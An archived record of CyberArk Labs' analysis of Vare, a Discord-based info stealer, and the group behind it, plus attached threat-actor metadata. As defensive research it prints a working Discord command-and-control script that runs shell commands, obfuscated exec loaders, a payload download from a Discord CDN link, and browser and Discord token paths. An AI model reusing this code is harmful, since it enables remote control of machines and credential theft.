{
	"id": "b915c0a1-1303-4bb0-af2d-2776e7aef2b3",
	"created_at": "2026-04-06T00:12:13.442164Z",
	"updated_at": "2026-04-10T03:36:48.472136Z",
	"deleted_at": null,
	"sha1_hash": "c92200ed111dde28af32346204ef5bd37811dc56",
	"title": "The (Not so) Secret War on Discord",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2210391,
	"plain_text": "The (Not so) Secret War on Discord\r\nBy CyberArk Labs\r\nPublished: 2023-04-13 · Archived: 2026-04-05 15:13:58 UTC\r\nCyberArk Malware Research Team\r\nAbstract\r\nCyberArk Labs discovered a new malware called Vare that is distributed over the popular chatting service, Discord. Vare has been used to target new malware operators by using social engineering tactics on them. Additionally, we have found that Vare uses Discord’s infrastructure as a backbone for its operations. This malware is linked to a new group called “Kurdistan 4455” based out of southern Turkey and is still early in its forming stage.\r\nOrigins of Discord Malware\r\nDiscord is a very popular online chatting service (similar to Slack, but less formal) that has more than 300 million active users. Discord was initially meant to be a platform for gaming communities; however, its ease of use and features expanded its appeal to a variety of communities, ranging from hobby clubs to users with shared political views who now call it home.\r\nDiscord is loved by developers due to its easy-to-use and well-documented APIs. It boasts several features that developers use to integrate their tools and develop bots for their servers with ease. Attackers have found ways to misuse those features, which makes the development of malware easier and makes it harder to detect and mitigate.\r\nhttps://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord\r\nPage 1 of 15\n\nThe origins of malware on the platform can be traced back to the introduction of Discord Nitro. For a monthly fee, Nitro allows users to send larger files and longer messages, have higher quality video streaming and much more. As with many premium features, Discord Nitro became highly desirable amongst users and motivated some users to try and acquire it without paying. This led users to resort to nefarious methods to obtain Nitro, such as brute-forcing gift keys and social engineering. Eventually, some users took this approach one step further and began operating malware to gain money by targeting others on the platform, stealing their credit card information and remotely purchasing Discord Nitro gift keys without the victim’s knowledge. These gift keys can be redeemed to get Discord Nitro, and malicious actors are selling the keys for profit.\r\nMalware targeting Discord users or misuse of Discord’s features for malicious intent is not a new finding, as there are several past publications on the matter, see for example here and here. This blog post aims to give an overview of the current threat landscape, the latest trends, methods and how they work, and to share our observations of a newly found malware group ‘Kurdistan 4455’ that has adopted those past methods for their own benefit, targeting other malware groups instead of users, reaping their success with minimal effort.\r\nIn an effort to keep Discord users and communities safe, we have contacted Discord and notified their support team of the different ways attackers misuse Discord’s features, and of the new malware group. However, despite our numerous attempts we did not get a definitive response from Discord. We hope that this blog post raises awareness of the issue, so that users can apply measures to protect themselves against common attack methods that are employed on Discord.\r\nContent Delivery Network\r\nA Content Delivery Network, better known by the acronym CDN, is, simply put, a hosting service for files that provides high availability and uptime. Malware operators utilize this feature for hosting payloads that their tools can then download and run. Being hosted on a popular service and protected by HTTPS makes the process of differentiating between the malicious and benign files a difficult task.\r\nhttps://cdn.discordapp.com/attachments//\r\nEasy-to-Use API\r\nDiscord’s API allows straightforward communication between users on the platform and the program using the API, allowing sending and receiving messages and files. As a result, implementing Command \u0026 Control (C\u0026C) communication over the API is as simple a task as writing the following 16 lines of code — which is a simple script that executes every message you send and returns the output.\r\nimport discord\r\nimport subprocess\r\nclass MyClient(discord.Client):\r\n    async def on_message(self, message):\r\n        # don't respond to ourselves\r\n        if message.author != self.user:\r\n            return\r\n        result = subprocess.run([message.content], stdout=subprocess.PIPE, shell=True).stdout.decode\r\n        await message.channel.send('result')\r\nintents = discord.Intents.default()\r\nintents.message_content = True\r\nMyClient(intents=intents).run('token')\r\nIt is difficult to monitor and mitigate this type of C\u0026C communication because it is communicating with a single endpoint that can be used by legitimate services, and it is protected by HTTPS, which makes the process of differentiating the malicious and benign API calls a non-trivial task.\r\nhttps://discord.com/api\r\nWebhooks\r\nIntroduced in 2020, webhooks are a relatively new Discord feature that is being used with ill intent. This feature allows any server owner to create a webhook for any channel they own and send messages to that channel through the webhook with a simple HTTPS request.\r\nThis feature is a great way to safely and quickly notify users of specific actions — originally meant to execute actions such as notification of a new git pull request. Attackers have started misusing this feature to exfiltrate data from their victims.\r\nSimilar to the Discord API, protecting against webhook misuse is a difficult task due to the fact that all of the requests go to the same domain — and to the content being protected by HTTPS — making monitoring and blocking a non-trivial challenge.\r\nIt is important to emphasize that, unlike Discord’s API, webhooks do not allow actions other than sending a message and files to a channel and are not used to create a C\u0026C communication channel.\r\nhttps://discord.com/api/webhooks/\u003cID\u003e/\u003cSPECIAL_TOKEN\u003e\r\nInjecting Code into Discord\r\nA method that has recently risen in popularity is injecting a payload into Discord’s source code. This is possible due to the fact that Discord is an ElectronJS app written in NodeJS. ElectronJS is a framework that allows the creation of desktop apps that are in essence a NodeJS-based website running locally in a Chromium browser. All of the source code for the app is hosted locally in plaintext and is not checked for tampering prior to execution.\r\nThere are two main reasons for this method’s growing popularity. The first one is persistence. As the payload is part of Discord’s app source code, it gets executed at the app’s start, which is usually at logon.\r\nThe second reason centers on integrating into Discord’s client, impersonating the victim and forging requests as the victim. This allows the malware operator to take actions like exfiltrating all private conversations, forging messages as the victim and purchasing Discord Nitro gift keys — a popular way to steal money without an easy trace to follow, as the attackers usually sell the stolen keys at a discounted rate and don’t have a direct paper trail leading to them.\r\nAs much as this method might sound appealing, there are several downsides to the injection approach — for example, it is susceptible to removal when Discord has an update, and it requires an initial “injector” to write the payload into the app’s source code.\r\nGitHub and Some Statistics\r\nThere is a growing trend of developing malware for targeting Discord (usually called “Discord Stealer”) directly on GitHub, which allows operators to easily take a repository, clone it, compile it and within minutes have a functioning malware sample that they can use to infect victims.\r\nFigure 1: Search results for “Discord Stealer,” a common nickname for malware for Discord\r\nWe’ve scanned and analyzed 2,390 of GitHub’s public repositories related to Discord malware, and gathered some interesting findings:\r\n44.5% of repositories are written in Python and are standalone malware.\r\n20.5% of repositories (second in popularity) are written in JavaScript; these repositories mainly take the approach of injecting into Discord.\r\nWe have also analyzed the activity of those repositories, tracking the number of commits per month, and we have found that they are growing in popularity substantially in recent years.\r\nFigure 2: Activity heatmap per month in years 2016 – 2022 from 2,390 repositories related to Discord malware\r\nVare\r\nIn September 2022, CyberArk Labs detected an intriguing sample called “vare_stealer_builder.exe.” Upon further research, we discovered a link to a new cybercrime group in its early stages of armament and formation, and we have followed its efforts closely.\r\nVare is a malware written in Python and converted into an executable with pyInstaller. It is an info stealer that uses Discord both as a data exfiltration infrastructure and a target to steal from.\r\nWhen running the sample, we were greeted with the following message:\r\nFigure 3: Fake configuration panel\r\nWhile the malware calls itself a builder, we can see it only looks like one!\r\nSo, what is actually happening here? This is a classic example of “smoke and mirrors,” a deception made to trick victims into thinking that they are configuring and creating a new sample while they, themselves, are being compromised.\r\nTechnical Analysis Overview\r\nVare is comprised of two publicly available tools — Veerus and Empyrean — and an additional custom module. The malware follows this logic flow:\r\nFigure 4: Vare logic flow\r\nBreaking it down further, we have identified three unique areas in the malware and have identified the origin of each one. Next, we will dive deeper into the malware and go over the different elements.\r\nVeerus: Obfuscation Layers\r\nStarting with what we dub the obfuscation layers, we have discovered that the malware author used the same build system as in the https://github.com/0xSxZ/Veerus repository, as we found a shared custom obfuscation library made by the Veerus author.\r\nThe first layer is a simple base64 obfuscation.\r\nThe second layer of the obfuscation is the custom-made obfuscation library, originally created for Veerus, but now also used in Vare.\r\nimport pyImpossibleObf\r\nexec(pyImpossibleObf.deobfuscate([72, 68, 70, 35, 49, ... ]))\r\nEmpyrean: Main Functionality\r\nFollowing the obfuscation layers, there are several modules that were taken from an older snapshot of Empyrean, a very popular Discord stealer on GitHub. In this version it has five modules:\r\n1. Debug:\r\nCompares system information against a list of blacklisted values. System information includes the IP and MAC addresses, username, PC name, currently running processes and lastly the HWID (by running C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid).\r\nThe malware will exit (but will not delete itself) if any piece of system information is found inside the blacklists.\r\n2. Startup:\r\nResponsible for persistence.\r\nDrops a copy of the malware in %APPDATA%\\empyrean\\dat.txt.\r\nCreates a script to run the dropped malware in %APPDATA%\\empyrean\\run.bat.\r\nAdds a registry entry in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\empyrean pointing to the run.bat file.\r\nFigure 5: Persistence on Startup\r\n3. Chromium:\r\nTargets Google Chrome, Microsoft Edge and Brave.\r\nCollects passwords, cookies, browsing and search history, and bookmarks.\r\nSends all collected information through a Discord webhook.\r\nFigure 6: Example of how the operators will see the collected browser information\r\n4. Discord:\r\nCollects session tokens, billing information, Nitro status, the account-bound phone number and additional account information.\r\nSends all collected information through a Discord webhook.\r\nFigure 7: Example of how the operators will see the collected Discord information\r\n5. Sysinfo:\r\nCollects the username, system information, disk usage, Wi-Fi and network information.\r\nTakes a screenshot.\r\nSends all collected information through a Discord webhook.\r\nFigure 8: Example of how the operators will see the collected system information\r\nVare – Custom Code\r\nIn addition to the code identified from public repositories, we have identified code written by the author that, as mentioned before, allows the malware to masquerade as a builder: a tool for configuring and creating new instances of malware clients.\r\nTo further add to the illusion of building a new instance, Vare downloads and saves a file with the name “built.exe” to trick users into thinking that this is their newly built client — while in reality, this is simply another variation of Vare, but without any prints.\r\ndef download(O00OO0OOO000OO00O):\r\n    OOO00O0000O0OO0OO= requests.get(O00OO0OOO000OO00O)\r\n    OOOOOOOO00OO00O00= O00OO0OOO000OO00O.split(\"/\")[-1]\r\n    with open(OOOOOOOO00OO00O00 ,\"wb\") as OO0O0O0O00000O0OO:\r\n        OO0O0O0O00000O0OO.write(OOO00O0000O0OO0OO.content)\r\ndownload(\"https://cdn.discordapp[.]com/attachments/1013115456963489868/1021582059543740476/build.exe\r\nUsing all of the deceptions we have described, there is one additional payload that is executed, hidden in another layer of obfuscation as seen here:\r\nmagic = 'aW1wb3J0IG9zICNsaW5lOj...PME8wME9P'\r\nlove = 'ZR8jZQNtBvAfnJ5yBwpmQD...tVPNtVPNt'\r\ngod = 'ICAgICBjb250aW51ZSAjbG...gLCJhIilh'\r\ndestiny = 'plOCG09CGmOCZQNjG09CG...covNbXD=='\r\njoy = '\\x72\\x6f\\x74\\x31\\x33'\r\ntrust = eval('\\x6d\\x61\\x67\\x69\\x63') + eval('\\x63\\x6f\\x64\\x65\\x63\\x73\\x2e\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\r\nexec(compile(base64.b64decode(eval('\\x74\\x72\\x75\\x73\\x74')),'','exec'))\r\nThe obfuscation is comprised of several layers. First, there is the eval layer that is visible inside the “trust” variable. Eval is used to execute python code that is stored in a variable, which in our situation translates into:\r\nmagic + codecs.decode(love, joy) + god + codecs.decode(destiny, joy)\r\nThis layer is responsible for generating a base64 string from several variables; the layer uses the python built-in library codecs to decode two variables — love and destiny — that are obfuscated with rot13. The generated base64 contains the payload, and it is decoded and executed one final time.\r\nThe hidden payload collects passwords, cookies and session tokens from various browsers and Discord. Similar to how the rest of Vare operates, this information is exfiltrated via a Discord webhook.\r\nlocal = os.getenv('LOCALAPPDATA')\r\nroaming = os.getenv('APPDATA')\r\ntokenPaths = {'Discord': f\"{roaming}\\\\Discord\",\r\n              'Discord Canary': f\"{roaming}\\\\discordcanary\",\r\n              'Discord PTB': f\"{roaming}\\\\discordptb\",\r\n              'Google Chrome': f\"{local}\\\\Google\\\\Chrome\\\\User Data\\\\Default\",\r\n              'Opera': f\"{roaming}\\\\Opera Software\\\\Opera Stable\",\r\n              'Brave': f\"{local}\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default\",\r\n              'Yandex': f\"{local}\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\",\r\n              'OperaGX': f\"{roaming}\\\\Opera Software\\\\Opera GX Stable\"}\r\nKurdistan 4455\r\nIn this part, we will provide a deep dive analysis of the new group we have discovered, how we discovered them and their motivations for running the group.\r\nMalware Author\r\nDuring our research into Vare, we found a single piece of evidence that connects the developer to the tool. The evidence is a single line of code found inside Vare that is meant for exfiltrating collected data; please note that due to the sensitivity of the matter we replaced the real usernames with pseudonyms:\r\nwebhook.send(embed=embed, username='Vare | Github MalwareAuthor, avatar_url='https://cdn.discordapp.c\r\nThis led us to a GitHub user with the same username, whom we believe is the malware author.\r\nFigure 9: MalwareAuthor’s GitHub profile\r\nWe did not find a repository called “Vare” under his account (we assume he made it private), but we did find additional evidence that makes us believe that he is, in fact, the malware author.\r\nWe found that he forked Veerus, the project the obfuscation was borrowed from.\r\nFigure 10: Forked Veerus repository by MalwareAuthor\r\nDiving deeper into the user, we see his repositories and starred projects are all Discord malware-related, and all of his activity is connected to those efforts, further confirming our theory.\r\nA Co-developer\r\nTriaging outwards from MalwareAuthor, we found that he only has one follower — and both account descriptions state that the user’s company name is “4455.” Both accounts also have a Discord invite link to the same server and state that they are from Turkey. Later, we found out that the follower is a friend of our developer and they are both in the same group.\r\nFigure 11: CoDeveloper profile snippet, the co-developer\r\nFrom what we can see, MalwareAuthor is working on the client-side aspect of the malware, while CoDeveloper is focusing on support tools, creating tools for brute-force finding of Discord Nitro gift keys (Premium Discord features), scripts to check if stolen tokens are valid and usable, and more.\r\nDiscord Server\r\nBoth MalwareAuthor’s and CoDeveloper’s GitHub pages include an invite link to their server — using the link, we were able to join the group’s Discord server (originally named “Kurdistan 4455”). We found around 150 members, about 50 of whom were tagged as being an active part of 4455.\r\nThe server (and presumably the group) was created around May 2022.\r\nFigure 12: Server ID and creation date\r\nFrom our reconnaissance phase, we can assume that the group’s motivation is twofold:\r\nThe first motivation is monetary, as they tried selling Discord Nitro to users at a discounted rate — a common way to launder money from stolen credit card data on the platform.\r\nThe second motivation is hacktivism. Based on their ideology and their origin, we assume this stems from the long-standing conflict between Turkey and the Kurdish people.\r\nConclusion\r\nOne of many examples, Vare is a perfect case of how publicly available repositories are being used to help arm cybercrime groups and how attackers can leverage Discord’s infrastructure maliciously. And sadly, as seen in our research of the activity on GitHub on these topics, the phenomenon is only growing in popularity.\r\nWith Discord being such a popular platform among corporate developers, these developers could potentially put their organizations at risk if the malware is able to infect their endpoints.\r\nAs Discord continues to grow, we can only expect an advancement in malware complexity and capabilities, and additional approaches when it comes to using Discord’s infrastructure. Additionally, similar approaches may be used to misuse other online chat services.\r\nWe believe that the group will evolve to using a Discord Injection module as seen in newer versions of https://github.com/addi00000/empyrean. Whether by upgrading Vare or using a new tool, this Injection module adds additional persistence and enables spoofing user actions.\r\nOne evolution that we have already observed is the transition into compiled languages such as Rust and C++ for the standalone versions of Discord malware — these make analyses take longer and allow the attackers to move faster and use more widely available obfuscation and packing tools with relative ease.\r\nIOC\r\nDiscord Webhook (Empyrean module): https://discord[.]com/api/webhooks/1021574403802280046/rKIMx2Nq8SgIn48QD74Grm2XErZ-30gLtwXCHouvWxmWu1vTtF7yGkduiXYAwRUuuHk3\r\nDiscord Webhook (custom module): https://discord[.]com/api/webhooks/1021574457652953178/kVIULeWZgij4sfsg23PPb-lIUKzz9NJ7TWo7AuFMk0hQ5XlswI5_xsQJsHyzHT9isiK7\r\nRegistry persistence path: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\empyrean\r\nPath to payload on disk: %APPDATA%\\empyrean\\dat.txt\r\nPath to payload runner on disk: %APPDATA%\\empyrean\\run.bat\r\nVare GUI sha256: 9c54484a5af113a679a2006257da3245ee2d080bd4dd2a4d35478979e7888117\r\nVare no GUI sha256: c598a6da98c0b862a6bac8fbed7c25c51c4885a20a8221756fa25cf3ad2c7484\r\nSource: https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord"
	],
	"report_names": [
		"the-not-so-secret-war-on-discord"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9041c438-4bc0-4863-b89c-a32bba33903c",
			"created_at": "2023-01-06T13:46:38.232751Z",
			"updated_at": "2026-04-10T02:00:02.888195Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove"
			],
			"source_name": "MISPGALAXY:Nitro",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b44a04-a080-4465-973d-976ce53777de",
			"created_at": "2022-10-25T16:07:23.911791Z",
			"updated_at": "2026-04-10T02:00:04.786538Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove",
				"Nitro"
			],
			"source_name": "ETDA:Nitro",
			"tools": [
				"AngryRebel",
				"Backdoor.Apocalipto",
				"Chymine",
				"Darkmoon",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Moudour",
				"Mydoor",
				"PCClient",
				"PCRat",
				"Poison Ivy",
				"SPIVY",
				"Spindest",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434333,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c92200ed111dde28af32346204ef5bd37811dc56.pdf",
		"text": "https://archive.orkl.eu/c92200ed111dde28af32346204ef5bd37811dc56.txt",
		"img": "https://archive.orkl.eu/c92200ed111dde28af32346204ef5bd37811dc56.jpg"
	}
}